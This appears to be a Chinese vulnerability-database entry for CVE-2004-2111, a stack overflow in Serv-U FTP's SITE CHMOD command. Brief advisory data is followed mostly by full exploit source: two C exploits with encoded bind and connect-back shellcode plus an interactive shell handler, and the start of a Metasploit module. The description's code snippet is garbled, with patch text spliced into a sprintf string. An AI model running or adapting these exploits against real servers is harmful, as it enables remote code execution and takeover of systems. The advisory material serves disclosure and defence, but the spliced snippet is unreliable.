CVE-2004-2111
CVSS8.5
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 23:06:24
NMCOEPS    

[原文]Stack-based buffer overflow in the site chmod command in Serv-U FTP Server before 4.2 allows remote attackers to execute arbitrary code via a long filename.


[CNNVD]Serv-U FTP服务器SITE CHMOD命令超长文件名远程溢出漏洞(CNNVD-200412-440)

        
        Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。
        Serv-U在处理"site chmod"命令的时候,如果后面文件名参数过长将导致缓冲区溢出,远程攻击者可以利用这个漏洞以Serv-U进程的权限执行任意指令。
        Serv-U在给不存在的文件执行chmod命令的时候,会给用户返回该文件或目录不存在的信息,这个信息字串使用类似如下的代码创建:
        sprintf(dst, "厂商补丁:
        RhinoSoft
        ---------
        目前厂商已经在5.0及以上版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.serv-u.com/
: No such file or directory.", filename);
        变量dst的长度是256字节,如果发送超长的filename,Serv-U将崩溃。
        要成功利用这个漏洞,必须要有一个Serv-U的登陆账号并且要有一个可写的目录。
        

- CVSS (基础分值)

CVSS分值: 8.5 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: SINGLE_INSTANCE [--]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:serv-u:serv-u:3.1.0.1Serv-U 3.1.0.1
cpe:/a:serv-u:serv-u:3.1.0.0Serv-U 3.1.0.0
cpe:/a:serv-u:serv-u:3.0.0.16Serv-U 3.0.0.16
cpe:/a:serv-u:serv-u:3.0.0.17Serv-U 3.0.0.17
cpe:/a:serv-u:serv-u:4.0.0.4Serv-U 4.0.0.4
cpe:/a:serv-u:serv-u:4.1.0.0Serv-U 4.1.0.0
cpe:/a:serv-u:serv-u:4.1.0.3Serv-U 4.1.0.3
cpe:/a:serv-u:serv-u:3.1.0.3Serv-U 3.1.0.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2111
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2111
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-440
(官方数据源) CNNVD

- 其它链接及资源

http://archives.neohapsis.com/archives/bugtraq/2004-01/0249.html
(UNKNOWN)  BUGTRAQ  20040124 [SST]ServU MDTM command remote buffero verflow adv
http://marc.info/?l=bugtraq&m=107513654005840&w=2
(UNKNOWN)  BUGTRAQ  20040126 Serv-U ftp 4.2 site chmod long_file_name exploit
http://securitytracker.com/id?1008841
(UNKNOWN)  SECTRACK  1008841
http://www.securityfocus.com/bid/9483
(UNKNOWN)  BID  9483
http://www.securityfocus.com/bid/9675
(UNKNOWN)  BID  9675
http://xforce.iss.net/xforce/xfdb/14931
(UNKNOWN)  XF  servu-chmodcommand-execute-code(14931)

- 漏洞信息

Serv-U FTP服务器SITE CHMOD命令超长文件名远程溢出漏洞
高危 边界条件错误
2004-12-31 00:00:00 2010-04-27 00:00:00
远程  
        
        Serv-U是一个Windows平台下使用非常广泛的FTP服务器软件。
        Serv-U在处理"site chmod"命令的时候,如果后面文件名参数过长将导致缓冲区溢出,远程攻击者可以利用这个漏洞以Serv-U进程的权限执行任意指令。
        Serv-U在给不存在的文件执行chmod命令的时候,会给用户返回该文件或目录不存在的信息,这个信息字串使用类似如下的代码创建:
        sprintf(dst, "厂商补丁:
        RhinoSoft
        ---------
        目前厂商已经在5.0及以上版本的软件中修复了这个安全问题,请到厂商的主页下载:
        
        http://www.serv-u.com/
: No such file or directory.", filename);
        变量dst的长度是256字节,如果发送超长的filename,Serv-U将崩溃。
        要成功利用这个漏洞,必须要有一个Serv-U的登陆账号并且要有一个可写的目录。
        

- 公告与补丁

        

- 漏洞信息 (149)

Serv-U FTPD 3.x/4.x "SITE CHMOD" Command Remote Exploit (EDBID:149)
windows remote
2004-01-27 Verified
21 lion
[点击下载] [点击下载]
/*
*-----------------------------------------------------------------------
* 
* Servu.c - Serv-U FTPD 3.x/4.x "SITE CHMOD" Command
* Remote stack buffer overflow exploit
*
* Copyright (C) 2004 HUC All Rights Reserved.
*
* Author   : lion
*          : lion@cnhonker.net
*          : http://www.cnhonker.com
* Date     : 2004-01-25
*          : 2004-01-25 v1.0 Can attack Serv-U v3.0.0.20~v4.1.0.11
* Tested   : Windows 2000 Server EN/GB
*          :	 + Serv-U v3.0.0.20~v4.1.0.11
* Notice   : *** Bug find by kkqq kkqq@0x557.org ***
*          : *** You need a valid account and a writable directory. ***
* Complie  : cl Servu.c
* Usage	   : Servu <-i ip> <-t type> [-u user] [-p pass] [-d dir] [-f ftpport] [-c cbhost] [-s shellport]
*------------------------------------------------------------------------
*/

#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#pragma comment(lib, "ws2_32")

// for bind shellcode
#define BIND_OFFSET		91

// for connectback shellcode
#define PORT_OFFSET		95
#define IP_OFFSET		88

#define SEH_OFFSET		0x193	//v3.0.0.20~v4.1.0.11
//#define	SEH_OFFSET		0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
#define MAX_LEN			2048
#define JMP_OVER		"\xeb\x06\xeb\x06"
#define	VERSION			"1.0"

struct
{
	DWORD	dwJMP;
	char	*szDescription;
}targets[] =
{
	{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL"},	//for all GB win2000 and winxp
// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4"},	//wsock32.dll jmp ebx addr
// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1"},	//wsock32.dll jmp ebx addr
// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4"},	//user32.dll jmp ebx addr
// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL"},	//for all BG win2000 and winxp	
// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4"},	//setupapi.dll jmp ebx addr
// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1"},
// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},         
},v;


unsigned char	*szSend[4];
unsigned char	szCommand[MAX_LEN];
char		szDirectory[0x100];

// 28 bytes decode by lion, don't change this.
unsigned char decode[]=
"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";

// Shellcode start sign, use for decode, don't change this.
unsigned char sc_start[]=
"lion"; 

// Shellcode end sign, use for decode, don't change this.
unsigned char sc_end[]=
"li0n"; 

// 311 bytes bind shellcode by lion (xor with 0x93)
unsigned char sc[]=
"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
"\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2\xC2\xF9\x92\xC2\xC2\x6C\xE5"
"\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C\x6C\xA2\x6C\xC5\x9B\xC0\x6C"
"\xC5\xB7\x6C\xC5\x9F\xC2\xC5\x18\xE6\xAF\x18\xE7\xBD\xEB\x90\x66"
"\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA\xD2\x3E\x90\x56\xA0\x48\x9C"
"\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E\x90\x49\xD3\x78\x62\xA8\x8C"
"\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5\x18\x9F\xD8\x18\xCD\x8F\x90"
"\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA\x50\x7B\x65\x6D\x6C\x6C\x1D"
"\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A\x96\x5D\xED\x4B\x71\xE0\x58"
"\x7E\x6F\xA8\x4A\x9A\x66\x3E\x37\x89\xE3\x54\x37\x3E\xBD\x7A\x76"
"\xDA\x15\xDA\x74\xEA\x55\xEA";

// 294 bytes connectback shellcode by lion (xor with 0x93)
unsigned char cbsc[]=
"\x7A\x6F\x93\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x0F\x93\x93\x93"
"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
"\x7B\xF9\x97\xCA\x7B\x10\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
"\xF9\x91\x6C\xC5\x87\x18\x4B\xFB\xEC\x93\x93\x92\xFB\x91\x93\x93"
"\xA6\x18\x5F\xF9\x83\xC2\xC0\x6C\xC5\x8B\x16\x53\xE6\xD8\xA0\x53"
"\xFB\xF0\xFE\xF7\x93\x1A\xF5\xA3\x10\x7F\xC7\x18\x6F\xF9\x83\xCA"
"\x1A\x97\x1C\x71\x68\x55\xD4\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A"
"\xCC\xDB\x1A\xCC\xDF\x1A\xCC\xC3\x1E\xD7\xB7\x83\xC4\xC3\xC2\xC2"
"\xC2\xF9\x92\xC2\xC2\x6C\xE5\xA3\xC2\x6C\xC5\x97\x18\x5F\xF9\x6C"
"\x6C\xA2\x6C\xC5\x9B\xC0\x6C\xC5\x8F\x6C\xC5\x9F\xC2\xC5\x18\xE6"
"\xAF\x18\xE7\xBD\xEB\x90\x66\xC5\x18\xE5\xB3\x90\x66\xA0\x5A\xDA"
"\xD2\x3E\x90\x56\xA0\x48\x9C\x2D\x83\xA9\x45\xE7\x9B\x52\x58\x9E"
"\x90\x49\xD3\x78\x62\xA8\x8C\xE6\x74\xCD\x18\xCD\xB7\x90\x4E\xF5"
"\x18\x9F\xD8\x18\xCD\x8F\x90\x4E\x18\x97\x18\x90\x56\x38\xCD\xCA"
"\x50\x7B\x6C\x6D\x6C\x6C\x1D\xDD\x9D\x7F\xE1\x6D\x20\x85\x3E\x4A"
"\x96\x5D\xED\x4B\x71\xE0\x58\x7E\x6F\xA8\x4A\x9A\x66\x3E\x7F\x6A"
"\x39\xF3\x74\xEA\x55\xEA";

void usage(char *p)
{
	int	i;
	printf( "Usage:\t%s\t<-i ip> <-t type>\n"
		"\t\t[-u user] [-p pass] [-d dir]\n"
		"\t\t[-f ftpport] [-c cbhost] [-s shellport]\n\n"
		"[type]:\n" , p);	
	for(i=0;i<sizeof(targets)/sizeof(v);i++)
	{
		printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription);
	}
}

/* ripped from TESO code and modifed by ey4s for win32 */
void shell (int sock)
{
	int     l;
	char    buf[512];
	struct	timeval time;
	unsigned long	ul[2];

	time.tv_sec = 1;
	time.tv_usec = 0;

	while (1)
	{
		ul[0] = 1;
		ul[1] = sock;

		l = select (0, (fd_set *)&ul, NULL, NULL, &time);
		if(l == 1)
		{
			l = recv (sock, buf, sizeof (buf), 0);
			if (l <= 0)
			{
				printf ("[-] Connection closed.\n");
				return;
			}
			l = write (1, buf, l);
			if (l <= 0)
			{
				printf ("[-] Connection closed.\n");
				return;
			}
		}
		else
		{
			l = read (0, buf, sizeof (buf));
			if (l <= 0)
			{
				printf("[-] Connection closed.\n");
				return;
			}
			l = send(sock, buf, l, 0);
			if (l <= 0)
			{
				printf("[-] Connection closed.\n");
				return;
			}
		}
	}
}

void main(int argc, char **argv)
{
	struct	sockaddr_in sa, server, client;
	WSADATA	wsd;
	SOCKET	s, s2, s3;
	int	iErr, ret, len;
	char	szRecvBuff[MAX_LEN];
	int	i, j, iType;
	int	iPort=21;
	char	*ip=NULL, *pUser="ftp", *pPass="ftp@ftp.com", *cbHost=NULL;
	char	user[128], pass[128];
	BOOL	bCb=FALSE, bLocal=TRUE;
	unsigned short	shport=53, shport2=0;
	unsigned long	cbip;
	unsigned int	timeout=5000, Reuse;
	char	penetrate[255],cbHost2[20];
	int seh_offset;
	
	printf( "Serv-U FTPD 3.x/4.x \"SITE CHMOD\" remote overflow exploit V%s\r\n"
		"Bug find by kkqq kkqq@0x557.org, Code By lion (lion@cnhonker.net)\r\n"
		"Welcome to HUC website http://www.cnhonker.com\r\n\n"
		 	, VERSION);

	seh_offset = SEH_OFFSET;
	
	if(argc < 4)
	{
		usage(argv[0]);
		return;
	}

	for(i=1;i<argc;i+=2)
	{
		if(strlen(argv[i]) != 2)
		{
			usage(argv[0]);
			return;
		}
		// check parameter
		if(i == argc-1)
		{
			usage(argv[0]);
			return;
		}
		switch(argv[i][1])
		{
			case 'i':
				ip=argv[i+1];
				break;
			case 't':
				iType = atoi(argv[i+1]);
				break;
			case 'f':
				iPort=atoi(argv[i+1]);
				break;
			case 'p':
				pPass = argv[i+1];
				break;
			case 'u':
				pUser=argv[i+1];
				break;
			case 'c':
				cbHost=argv[i+1];
				bCb=TRUE;
				break;
			case 's':
				shport=atoi(argv[i+1]);
				break;
			case 'd':
				if(argv[i+1][0] != '/')
					strcpy(szDirectory, "/");
				strncat(szDirectory, argv[i+1], sizeof(szDirectory)-0x20);
				
				if(szDirectory[strlen(szDirectory)-1] != '/')
					strcat(szDirectory, "/");
					
				// correct the directory len
				for(j=0;j<(strlen(szDirectory)-1)%8;j++)
					strcat(szDirectory, "x");
					
				//printf("%d:%s\r\n", strlen(szDirectory), szDirectory);
				seh_offset = seh_offset - strlen(szDirectory)+1;
				break;
		}
	}

	if((!ip) || (!user) || (!pass))
	{
		usage(argv[0]);
		printf("[-] Invalid parameter.\n");
		return;
	}

	if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) )
	{
		usage(argv[0]);
		printf("[-] Invalid type.\n");
		return;
	}

	if(iPort <0 || iPort >65535 || shport <0 || shport > 65535)
	{
		usage(argv[0]);
		printf("[-] Invalid port.\n");
		return;
	}
	
	_snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser);
	user[sizeof(user)-1]='\0';
	_snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass);
	pass[sizeof(pass)-1]='\0';
	szSend[0] = user;	//user
	szSend[1] = pass;	//pass	
	szSend[2] = penetrate;	//pentrate
	szSend[3] = szCommand;	//shellcode
	
	// Penetrate through the firewall.
	if(bCb && shport > 1024)
	{
		strncpy(cbHost2, cbHost, 20);
		for(i=0;i<strlen(cbHost); i++)
		{
			if(cbHost[i] == '.')
				cbHost2[i] = ',';
		}
		
		sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);

		//printf("%s", penetrate);
	}
	else
	{
		sprintf(penetrate,"TYPE I\r\n");		
	}

	// fill the "site chmod" command
	strcpy(szCommand, "site chmod 777 ");
	
	// fill the directory
	if(szDirectory[0])
		strcat(szCommand, szDirectory);

	// fill the egg
	for(i=0;i<seh_offset%8;i++)
		strcat(szCommand, "\x90");
	//strcat(szCommand, "BBBB");
	
	// fill the seh
	for(i=0;i<=(seh_offset/8)*8+0x20;i+=8)
	{
		strcat(szCommand, JMP_OVER);
		memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4);
	}
		
	// fill the decode
	strcat(szCommand, decode);

	// fill the shellcode start	sign
	strcat(szCommand, sc_start);

	// fill the shellcode
	if(bCb)
	{
		// connectback shellcode
		shport2 = htons(shport)^(u_short)0x9393;
		cbip = inet_addr(cbHost)^0x93939393;
		memcpy(&cbsc[PORT_OFFSET], &shport2, 2);
		memcpy(&cbsc[IP_OFFSET], &cbip, 4);
		strcat(szCommand, cbsc);		
	}
	else
	{
		// bind shellcode
		shport2 = htons(shport)^(u_short)0x9393;
		memcpy(&sc[BIND_OFFSET], &shport2, 2);
		strcat(szCommand, sc);
	}

	// fill the shellcode end sign
	strcat(szCommand, sc_end);

	// send end
	strcat(szCommand, "\r\n");

	if(strlen(szCommand) >= sizeof(szCommand))
	{
		printf("[-] stack buffer overflow.\n");
		return;
	}
	
//	printf("send size %d:%s", strlen(szCommand), szCommand);
	
	__try
	{
		if (WSAStartup(MAKEWORD(1,1), &wsd) != 0)
		{
			printf("[-] WSAStartup error:%d\n", WSAGetLastError());
			__leave;
		}

		s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
		if(s == INVALID_SOCKET)
		{
			printf("[-] Create socket failed:%d",GetLastError());
			__leave;
		}

		sa.sin_family=AF_INET;
		sa.sin_port=htons((USHORT)iPort);
		sa.sin_addr.S_un.S_addr=inet_addr(ip);

		setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
		iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa));
		if(iErr == SOCKET_ERROR)
		{
			printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError());
			__leave;
		}
		printf("[+] Connect to %s:%d success.\n", ip, iPort);
		
		if(bCb)
		{
			Sleep(500);
			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

			server.sin_family=AF_INET;
			server.sin_addr.S_un.S_addr=inet_addr(cbHost);
			//server.sin_addr.s_addr=INADDR_ANY; 
			server.sin_port=htons((unsigned short)shport);

			setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));

			Reuse = 1; 
			setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));

			if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR)
			{
				printf("[-] Bind port on %s:%d error.\n", cbHost, shport);
				printf("[-] You must run nc get the shell.\n");
				bLocal = FALSE;
				//closesocket(s2);
				//__leave;
			}
			else
			{	
				printf("[+] Bind port on %s:%d success.\n", cbHost, shport);
				listen(s2, 1); 
			}
		}
		
		for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++)
		{
			memset(szRecvBuff, 0, sizeof(szRecvBuff));
			iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Recv buffer error:%d.\n", WSAGetLastError());
				__leave;
			}
			printf("[+] Recv: %s", szRecvBuff);
			
			if(szRecvBuff[0] == '5')
			{
				printf("[-] Server return a error Message.\r\n");
				__leave;
			}

			iErr = send(s, szSend[i], strlen(szSend[i]),0);
			if(iErr == SOCKET_ERROR)
			{
				printf("[-] Send buffer error:%d.\n", WSAGetLastError());
				__leave;
			}

			if(i==sizeof(szSend)/sizeof(szSend[0])-1)
				printf("[+] Send shellcode %d bytes.\n", iErr);
			else
				printf("[+] Send: %s", szSend[i]);
		}

		printf("[+] If you don't have a shell it didn't work.\n");

		if(bCb)
		{
			if(bLocal)
			{
				printf("[+] Wait for shell...\n");
			
				len = sizeof(client);
				s3 = accept(s2, (struct sockaddr*)&client, &len); 
				if(s3 != INVALID_SOCKET) 
				{ 
	printf("[+] Exploit success! Good luck! :)\n");
	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
					shell(s3);
				}
			}	
		}
		else
		{
			printf("[+] Connect to shell...\n");
			
			Sleep(1000);
			s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
			server.sin_family = AF_INET;
			server.sin_port = htons(shport);
			server.sin_addr.s_addr=inet_addr(ip);

			ret = connect(s2, (struct sockaddr *)&server, sizeof(server));
			if(ret!=0)
			{
				printf("[-] Exploit seem failed.\n");
				__leave;
			}
			
	printf("[+] Exploit success! Good luck! :)\n");
	printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n");
			shell(s2);
		}
		
		
	}

 	__finally
	{
		if(s != INVALID_SOCKET) closesocket(s);
		if(s2 != INVALID_SOCKET) closesocket(s2);
		if(s3 != INVALID_SOCKET) closesocket(s3);
		WSACleanup();
	}

	return;
}

// milw0rm.com [2004-01-27]
		

- 漏洞信息 (822)

Serv-U 4.x "site chmod" Remote Buffer Overflow Exploit (EDBID:822)
windows remote
2004-01-30 Verified
21 SkyLined
[点击下载] [点击下载]
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

#define exploit_length      511
#define NOP 'A'

#define SEH_handler_offset  400
char* SEH_handler     = "\x41\x41\xEB\x04"; // 3) jmp over next four bytes
char* retaddress_4004 = "\xab\x1c\x5f\x01"; // 1) libeay32.015f1cab
char* retaddress_4100 = "\xcb\x1c\x41\x01"; // 1) ssleay32.01411ccb
char* retaddress_4103 = "\x8b\x1d\x41\x01"; // 1) ssleay32.01411d8b

char* shellcode = 
  "\xeb\x43\x56\x57\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x52\x8b\x52"
  "\x20\x01\xea\x31\xc0\x31\xc9\x41\x8b\x34\x8a\x01\xee\x31\xff\xc1"
  "\xcf\x13\xac\x01\xc7\x85\xc0\x75\xf6\x39\xdf\x75\xea\x5a\x8b\x5a"
  "\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
  "\xe8\x5f\x5e\xff\xe0\xfc\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b"
  "\x70\x1c\xad\x8b\x68\x08\x31\xc0\x66\xb8\x6c\x6c\x50\x68\x33\x32"
  "\x2e\x64\x68\x77\x73\x32\x5f\x54\xbb\x71\xa7\xe8\xfe\xe8\x90\xff"
  "\xff\xff\x89\xef\x89\xc5\x81\xc4\x70\xfe\xff\xff\x54\x31\xc0\xfe"
  "\xc4\x40\x50\xbb\x22\x7d\xab\x7d\xe8\x75\xff\xff\xff\x31\xc0\x50"
  "\x50\x50\x50\x40\x50\x40\x50\xbb\xa6\x55\x34\x79\xe8\x61\xff\xff"
  "\xff\x89\xc6\x31\xc0\x50\x50\x35\x02\x01\x70\xcc\xfe\xcc\x50\x89"
  "\xe0\x50\x6a\x10\x50\x56\xbb\x81\xb4\x2c\xbe\xe8\x42\xff\xff\xff"
  "\x31\xc0\x50\x56\xbb\xd3\xfa\x58\x9b\xe8\x34\xff\xff\xff\x58\x6a"
  "\x10\x54\x50\x56\xbb\x47\xf3\x56\xc6\xe8\x24\xff\xff\xff\x31\xdb"
  "\x53\x68\x2e\x63\x6d\x64\x89\xe1\x41\x50\x50\x50\x53\x53\x31\xc0"
  "\xfe\xc4\x40\x50\x53\x53\x53\x53\x53\x53\x53\x53\x53\x53\x6a\x44"
  "\x89\xe6\x50\x55\x53\x53\x53\x53\x54\x56\x53\x53\x53\x43\x53\x4b"
  "\x53\x53\x51\x53\x89\xfd\xbb\x21\xd0\x05\xd0\xe8\xe2\xfe\xff\xff"
  "\x31\xc0\x48\x8b\x44\x24\x04\xbb\x43\xcb\x8d\x5f\xe8\xd1\xfe\xff"
  "\xff\x5d\x5d\x5d\xbb\x12\x6b\x6d\xd0\xe8\xc4\xfe\xff\xff\x31\xc0"
  "\x50\x89\xfd\xbb\x69\x1d\x42\x3a\xe8\xb5\xfe\xff\xff";

int sock;
FILE* FILEsock;
int doubling;

void send_command(char *command, char *arguments) {
  int i;
  send(sock, command, strlen(command), 0);
  send(sock, " ", 1, 0);
  for (i=0; i<strlen(arguments); i++) {
    send(sock, arguments+i, 1, 0);
    if (doubling && arguments[i] == '\xff') send(sock, arguments+i, 1, 0);
  }
  send(sock, "\x0a\x0d", 2, 0);
}

int main(int argc, char *argv[], char *envp[]) {
  struct sockaddr_in addr;
  char *outbuffer, inbuffer[256];
  char *retaddress = NULL;
  char *version = NULL;

  if (argc<5) {
    printf("Usage: %s IP PORT USERNAME PASSWORD [DIRECTORY]\n", argv[0]);
    exit(-1);
  }

  printf("- Serv-ME ----------------------------------------------------\n"
         "  Serv-U v4.x \"site chmod\" exploit.\n"
         "  Written by SkyLined <SkyLined@EduP.TUDelft.nl>.\n"
         "  Credits for the vulnerability go to ICBM <icbm@0x557.net>.\n"
         "  Thanks to H D Moore for the shellcode (www.metasploit.com).\n"
         "  Greets to everyone at 0dd and #netric.\n"
         "  (K)(L)(F) for Suzan.\n"
         "\n"
         "  Binds a shell at %s:28876 if successfull.\n"
         "  Tested with: v4.0.0.4, v4.1.0.0, v4.1.0.3 on W2K-EN.\n"
         "--------------------------------------------------------------\n",
           argv[1]);

  addr.sin_family = AF_INET;
  addr.sin_port = htons(atoi(argv[2]));
  addr.sin_addr.s_addr = inet_addr(argv[1]);

  printf("\n[+] Connecting to %s:%s...\n", argv[1], argv[2]);
  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
    perror("Socket creation failed");
    exit(-1);
  }
  if (connect(sock, (struct sockaddr *)&addr, sizeof addr) == -1) {
    perror("Connection failed");
    exit(-1);
  }
  FILEsock = fdopen(sock, "r");
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "220 Serv-U FTP Server v4.") != inbuffer) {
    printf("[-] This is not a Serv-U v4.X ftp server.\n");
    exit(-1);
  }
  if (strstr(inbuffer, "v4.1") > 0) {
    retaddress = retaddress_4103;
    version = "4.1.0.3";
  }

  printf("\n[+] Login in as %s:%s...\n", argv[3], argv[4]);
  send_command("USER", argv[3]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  send_command("PASS", argv[4]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  if (strstr(inbuffer, "230") != inbuffer) {
    printf("[-] Login failed.\n");
    exit(-1);
  }

  if (argv[5]) {
    printf("\n[+] Changing directory...\n");
    send_command("CD", argv[5]);
    printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  }

  outbuffer = (char*) malloc(exploit_length + strlen(shellcode));
  memset(outbuffer, NOP, exploit_length);
  memcpy(outbuffer+exploit_length, shellcode, strlen(shellcode));

  printf("\n[+] Checking if \\xff doubling is nescesary: ");
  send_command("SITE CHMOD 477", "-\xff\xff-");
  fgets(inbuffer, sizeof inbuffer, FILEsock);
  if (strchr(inbuffer, '\xff') == strrchr(inbuffer, '\xff')) {
    doubling = 1;
    printf("Yes.");
    retaddress = retaddress_4004;
    version = "4.0.0.4";
  } else {
    printf("No.");
    if (retaddress==NULL) {
      retaddress = retaddress_4100;
      version = "4.1.0.0";
    }
  }
  printf("\n[+] Serv-U FTP server version %s: using retaddress 0x%08x",
                      version, *(int*)retaddress);
  memcpy(outbuffer + SEH_handler_offset, SEH_handler, strlen(SEH_handler));
  memcpy(outbuffer + SEH_handler_offset + 4, retaddress, strlen(retaddress));

  printf("\n[+] Sending exploit... ");
  send_command("SITE CHMOD 477", outbuffer);
  printf("send, you can now try to connect to %s:28876.\n", argv[1]);
  printf("    --> %s", fgets(inbuffer, sizeof inbuffer, FILEsock));
  close(socket);
  printf("\n[+] Done. \n");
}


// milw0rm.com [2004-01-30]
		

- 漏洞信息 (18190)

Serv-U FTP Server <4.2 Buffer Overflow (EDBID:18190)
windows remote
2011-12-02 Verified
0 metasploit
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::Egghunter
	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Serv-U FTP Server <4.2 Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in the site chmod command
				in versions of Serv-U FTP Server prior to 4.2.

				You must have valid credentials to trigger this vulnerability. Exploitation
				also leaves the service in a non-functional state.
			},
			'Author'         => 'thelightcosine <thelightcosine[at]metasploit.com>',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-2111'],
					[ 'BID', '9483'],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
